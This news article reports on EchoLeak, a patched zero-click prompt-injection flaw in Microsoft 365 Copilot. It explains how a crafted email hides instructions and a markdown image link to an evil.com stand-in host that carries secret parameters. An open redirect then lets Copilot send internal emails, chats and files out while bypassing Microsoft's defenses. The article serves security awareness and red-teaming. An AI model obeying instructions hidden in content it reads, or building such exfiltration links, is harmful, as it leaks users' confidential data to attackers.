
A newly uncovered zero-click exploit in Microsoft 365 Copilot has raised concerns about the hidden risks in enterprise AI tools.
Discovered by cybersecurity firm Aim Security, the vulnerability named “EchoLeak”, allows attackers to extract confidential business data using a single, specially crafted email—without requiring the victim to open or interact with it.
EchoLeak is reportedly the first documented zero-click attack on an AI agent. The exploit weaponizes Copilot’s contextual understanding, enabling it to process malicious prompts hidden within an email.
Once triggered, Copilot silently accesses internal content—emails, Teams chats, OneDrive files—and transmits that data to an external server, evading Microsoft’s standard defenses.
How EchoLeak Works
The attack works by exploiting Copilot’s dual access to both internal and external data sources.
It begins with an email containing a disguised markdown link, such as ![Image alt text][ref] [ref]: https://www.evil.com?param=<secret>.
When Copilot scans the email in the background, it follows the link—embedding sensitive parameters like user data or chat logs—into a request to an attacker-controlled domain.
According to Aim Security, this works due to a chain of vulnerabilities, including an open redirect in Microsoft’s Content Security Policy.
This redirect allows untrusted links to masquerade as trusted domains like Teams or SharePoint.
As a result, Microsoft’s protective mechanisms, such as defenses against Cross-Prompt Injection Attacks, are bypassed.
A New Class of AI Vulnerability
The firm classifies the flaw as an “LLM Scope Violation.” This refers to cases where prompts from outside a model’s trusted data environment influence the AI into accessing and leaking information beyond its intended boundary.
Microsoft confirmed the vulnerability was patched and stated that no customers were compromised.
However, Aim Security noted the discovery of similar design flaws in other AI systems, suggesting broader industry-wide risk, especially for platforms using Retrieval-Augmented Generation (RAG).
Recommended Actions
Experts warn that AI-powered assistants should now be treated as potential threat vectors.
“EchoLeak marks a shift to assumption-of-compromise architectures,” said Abhishek Anant Garg, an analyst at QKS Group speaking to CSO. “Enterprises must now assume adversarial prompt injection will occur.”, he added.
Industry leaders recommend robust input validation, strong data isolation policies, and red-team exercises targeting AI agents.
“CIOs must now design AI systems assuming adversarial autonomy,” Garg advised. “Every agent is a potential data leak and must undergo red-team validation before production.”
More stories on Microsoft:
- Microsoft Expands Security Copilot with AI Agents to Strengthen Cyber Defenses
- Microsoft Makes All New Accounts Passwordless by Default to Combat Cyber Threats
- Microsoft Launches ARC Initiative to Boost Cyber Resilience in Kenya and Across Africa